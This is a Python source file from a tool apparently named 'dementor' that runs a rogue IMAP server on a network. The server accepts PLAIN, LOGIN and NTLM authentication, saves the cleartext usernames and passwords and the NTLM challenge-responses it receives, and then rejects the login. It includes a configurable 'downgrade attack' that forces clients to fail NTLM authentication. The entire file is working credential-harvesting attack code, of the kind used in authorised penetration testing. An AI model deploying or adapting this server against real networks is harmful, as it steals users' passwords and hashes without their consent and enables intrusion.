# Copyright (c) 2025-Present MatrixEditor
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
#
# - [MS-OXIMAP]:
#    https://learn.microsoft.com/en-us/openspecs/exchange_server_protocols/ms-oximap4/b0f9d5f1-ac42-4b27-a874-0c3bf9e3b9b5
# - RFC-9501:
#    https://www.ietf.org/rfc/rfc9051.html
import base64
import binascii
import shlex

from impacket import ntlm

from dementor.protocols.ntlm import (
    NTLM_AUTH_CreateChallenge,
    NTLM_report_auth,
    NTLM_split_fqdn,
    ATTR_NTLM_CHALLENGE,
    ATTR_NTLM_ESS,
)
from dementor.servers import (
    ServerThread,
    ThreadingTCPServer,
    BaseProtoHandler,
    create_tls_context,
)
from dementor.logger import ProtocolLogger
from dementor.database import _CLEARTEXT
from dementor.config.toml import (
    TomlConfig,
    Attribute as A,
)
from dementor.config.attr import ATTR_TLS, ATTR_CERT, ATTR_KEY
from dementor.config.util import get_value


def apply_config(session):
    session.imap_config = list(
        map(IMAPServerConfig, get_value("IMAP", "Server", default=[]))
    )


def create_server_threads(session):
    return [
        ServerThread(
            session,
            IMAPServer,
            server_config=server_config,
            server_address=(session.bind_address, server_config.imap_port),
        )
        for server_config in (session.imap_config if session.imap_enabled else [])
    ]


IMAP_CAPABILITIES = [
    # NOTE: support STARTTLS is currently not avaialble
    # "STARTTLS",
    "IMAP4rev2",
    "IMAP4rev1",
]

IMAP_AUTH_MECHS = ["PLAIN", "LOGIN", "NTLM"]


class IMAPServerConfig(TomlConfig):
    _section_ = "IMAP"
    _fields_ = [
        A("imap_port", "Port"),
        A("imap_fqdn", "FQDN", "Dementor", section_local=False),
        A("imap_caps", "Capabilities", IMAP_CAPABILITIES),
        A("imap_auth_mechanisms", "AuthMechanisms", IMAP_AUTH_MECHS),
        A("imap_banner", "Banner", "IMAP4rev2 service ready"),
        A("imap_downgrade", "Downgrade", True),
        ATTR_NTLM_CHALLENGE,
        ATTR_NTLM_ESS,
        ATTR_KEY,
        ATTR_CERT,
        ATTR_TLS,
    ]


class StopHandler(Exception):
    pass


class IMAPHandler(BaseProtoHandler):
    def __init__(self, config, server_config, request, client_address, server) -> None:
        self.server_config = server_config
        self.seq_id = None
        super().__init__(config, request, client_address, server)

    def proto_logger(self) -> ProtocolLogger:
        return ProtocolLogger(
            extra={
                "protocol": "IMAP",
                "protocol_color": "honeydew2",
                "host": self.client_host,
                "port": self.server_config.imap_port,
            }
        )

    def _push(self, msg: str, seq=True) -> None:
        line = str(msg)
        #  2.2.1. Client Protocol Sender and Server Protocol Receiver
        # Each client command is prefixed with an identifier (typically a
        # short alphanumeric string, e.g., A0001, A0002, etc.) called a
        # "tag". A different tag is generated by the client for each command.
        if seq and self.seq_id:
            line = f"{self.seq_id} {line}"
        elif not seq:
            # 2.2.2. Server Protocol Sender and Client Protocol Receiver
            # Data transmitted by the server to the client and status responses
            # that do not indicate command completion are prefixed with the
            # token "*" and are called untagged responses.
            line = f"* {line}"
        self._write_line(line)

    def _write_line(self, msg: str) -> None:
        self.logger.debug(f"(imap) S: {msg!r}")
        self.send(f"{msg}\r\n".encode("utf-8", "strict"))

    #  There are three possible server completion responses:
    #   - OK (indicating success),
    #   - NO (indicating failure), or
    #   - BAD (indicating a protocol error such as unrecognized command or
    #          command syntax error).
    def ok(self, msg: str, seq=True):
        self._push(f"OK {msg}", seq)

    def no(self, msg: str, seq=True):
        self._push(f"NO {msg}", seq)

    def bad(self, msg: str, seq=True):
        self._push(f"BAD {msg}", seq)

    # NOTE: Section 2.2.2 states:
    # Servers SHOULD strictly enforce the syntax outlined in this specification.
    # Any client command with a protocol syntax error, including (but not limited
    # to) missing or extraneous spaces or arguments, SHOULD be rejected and the
    # client given a BAD server completion response.
    #
    # - We won't do that as this server just accepts the authorization

    def unquoted(self, data: str) -> str:
        # A quoted string is a sequence of zero or more Unicode characters, excluding
        # CR and LF, encoded in UTF-8, with double quote (<">) characters at each end.
        return data.removeprefix('"').removesuffix('"')

    def challenge_auth(
        self,
        token: bytes | None = None,
        decode: bool = False,
        prefix: str | None = None,
    ) -> bytes | str:
        #  6.2.2. AUTHENTICATE Command
        # The authentication protocol exchange consists of a series of server challenges
        # and client responses that are specific to the authentication mechanism. A server
        # challenge consists of a command continuation request response with the "+" token
        # followed by a base64-encoded (see Section 4 of [RFC4648]) string.
        line = prefix or "+"
        if token:
            line = f"{line} {base64.b64encode(token).decode()}"

        self._write_line(line)
        # he client response consists of a single line consisting of a base64-encoded string.
        # If the client wishes to cancel an authentication exchange, it issues a line consisting
        # of a single "*"
        resp = self.rfile.readline(1024).strip()
        self.logger.debug(f"(imap) C: {resp!r}")
        if resp == b"*":
            self.bad("Authentication canceled")
            raise StopHandler

        try:
            # If the server receives such a response, or if it receives an invalid base64 string
            # (e.g., characters outside the base64 alphabet or non-terminal "="), it MUST reject
            # the AUTHENTICATE command by sending a tagged BAD response.
            data = base64.b64decode(resp)
        except binascii.Error:
            self.bad("Invalid base64 string")
            raise StopHandler

        return data if not decode else data.decode("utf-8", errors="replace")

    def send_greeting(self):
        # 7.1.1.  OK Response
        # An untagged response can be used as a greeting at connection
        # startup.
        self.ok(self.server_config.imap_banner, seq=False)

    def handle_data(self, data, transport) -> None:
        #  The initial state is identified in the server greeting.
        self.send_greeting()
        self.request.settimeout(2)
        self.rfile = transport.makefile("rb")

        # 3.1. Not Authenticated State
        # In the not authenticated state, the client MUST supply authentication credentials before
        # most commands will be permitted. This state is entered when a connection starts unless
        # the connection has been pre-authenticated.
        while line := self.recv_line(1024):
            try:
                tag, cmd, *args = shlex.split(line)
                self.seq_id = tag
            except ValueError:
                self.logger.debug(f"(imap) Unknown command: {line!r}")
                self.bad("Invalid command")
                continue

            method = getattr(self, f"do_{cmd.upper()}", None)
            if method:
                try:
                    method(args)
                except StopHandler:
                    break
            else:
                self.logger.debug(f"(imap) Unknown command: {line!r}")
                #  7.1.5. BYE Response
                self._push("BYE Unknown command", seq=False)
                break

    def recv_line(self, size: int) -> str | None:
        data = self.rfile.readline(size)
        if data:
            text = data.decode("utf-8", errors="replace").strip()
            self.logger.debug(f"(imap) C: {text!r}")
            return text

    # implementation
    #  7.2.2. CAPABILITY Response
    def do_CAPABILITY(self, args):
        # The CAPABILITY response occurs as a result of a CAPABILITY command. The
        # capability listing contains a space-separated listing of capability names
        # that the server supports. The capability listing MUST include the atom
        # "IMAP4rev2", but note that it doesn't have to be the first capability listed.
        self.logger.display(f"Capabilities requested from {self.client_host}")
        capabilities = ["CAPABILITY"] + self.server_config.imap_caps
        capabilities.extend(
            map(lambda x: f"AUTH={x}", self.server_config.imap_auth_mechanisms)
        )
        self._push(" ".join(capabilities), seq=False)
        self.ok("CAPABILITY completed")
        pass

    #  6.1.2. NOOP Command
    def do_NOOP(self, args):
        # The NOOP command always succeeds. It does nothing.
        self.ok("NOOP completed")

    #  6.4.1. CLOSE Command
    def do_CLOSE(self, args):
        self.ok("CLOSE completed")
        raise StopHandler

    #  6.2.3. LOGIN Command
    def do_LOGIN(self, args: str):
        if len(args) != 2:
            return self.bad("Invalid number of arguments")

        username, password = args
        self.config.db.add_auth(
            client=self.client_address,
            username=self.unquoted(username),
            password=self.unquoted(password),
            logger=self.logger,
            credtype=_CLEARTEXT,
        )
        self.no("LOGIN failed")

    #  6.2.2. AUTHENTICATE Command
    def do_AUTHENTICATE(self, args):
        if len(args) < 1:
            return self.bad("Invalid number of arguments")

        auth_mechanism = self.unquoted(args[0].upper())
        method = getattr(self, f"auth_{auth_mechanism}", None)
        if method:
            method(*args[1:])
        else:
            self.bad("Unknown authentication mechanism")

    #  6.2.1. STARTTLS Command
    def do_STARTTLS(self, args):
        # NO - TLS negotiation can't be initiated, due to server configuration error
        self.no("STARTTLS not supported")

    # [MS-OXIMAP] 2.2.1 IMAP4 NTLM
    def auth_NTLM(self, initial_response=None):
        # IMAP4_AUTHENTICATE_NTLM_Supported_Response
        if not initial_response:
            token = self.challenge_auth()
        else:
            try:
                # When decoding the base64 data in the initial response, decoding
                # errors MUST be treated as in any normal SASL client response,
                # i.e., with a tagged BAD response.
                token = base64.b64decode(initial_response)
            except binascii.Error:
                return self.bad("Invalid Base64 encoding")

        # IMAP4_AUTHENTICATE_NTLM_Blob_Command
        negotiate = ntlm.NTLMAuthNegotiate()
        try:
            negotiate.fromString(token)
        except Exception as e:
            self.logger.debug(f"NTLM negotiation failed: {e}")
            return self.bad("NTLM negotiation failed")

        # IMAP4_AUTHENTICATE_NTLM_Blob_Response
        challenge = NTLM_AUTH_CreateChallenge(
            negotiate,
            *NTLM_split_fqdn(self.server_config.imap_fqdn),
            challenge=self.server_config.ntlm_challenge,
            disable_ess=not self.server_config.ntlm_ess,
        )

        # IMAP4_AUTHENTICATE_NTLM_Blob_Command
        token = self.challenge_auth(challenge.getData())
        auth_message = ntlm.NTLMAuthChallengeResponse()
        try:
            auth_message.fromString(token)
        except Exception as e:
            self.logger.debug(f"NTLM authentication failed: {e}")
            return self.bad("NTLM authentication failed")

        NTLM_report_auth(
            auth_message,
            challenge=self.server_config.ntlm_challenge,
            client=self.client_address,
            logger=self.logger,
            session=self.config,
        )

        if self.server_config.imap_downgrade:
            self.logger.display(f"Performing downgrade attack on {self.client_host}")
            return self.no("Authentication failed")

        self.ok("AUTHENTICATE completed")

    def auth_PLAIN(self, initial_response=None):
        if initial_response:
            login_and_password = base64.b64decode(initial_response)
        else:
            login_and_password = self.challenge_auth()

        # 2.  PLAIN SASL Mechanism
        try:
            _, login, password = login_and_password.split(b"\x00")
        except ValueError:
            return self.bad("Invalidlogin data")

        self.config.db.add_auth(
            client=self.client_address,
            username=login.decode(errors="replace"),
            password=password.decode(errors="replace"),
            logger=self.logger,
            credtype=_CLEARTEXT,
        )
        self.no("LOGIN failed")

    def auth_LOGIN(self):
        username = self.challenge_auth(decode=True)
        password = self.challenge_auth(decode=True)
        self.config.db.add_auth(
            client=self.client_address,
            username=username,
            password=password,
            logger=self.logger,
            credtype=_CLEARTEXT,
        )
        self.no("LOGIN failed")


class IMAPServer(ThreadingTCPServer):
    default_port = 143
    default_handler_class = IMAPHandler
    service_name = "IMAP"

    def __init__(
        self,
        config,
        server_address=None,
        RequestHandlerClass: type | None = None,
        server_config: IMAPServerConfig | None = None,
    ) -> None:
        self.server_config = server_config
        super().__init__(config, server_address, RequestHandlerClass)
        self.ssl_context = create_tls_context(self.server_config, self)
        if self.ssl_context:
            self.socket = self.ssl_context.wrap_socket(self.socket, server_side=True)

    def finish_request(self, request, client_address) -> None:
        self.RequestHandlerClass(
            self.config, self.server_config, request, client_address, self
        )
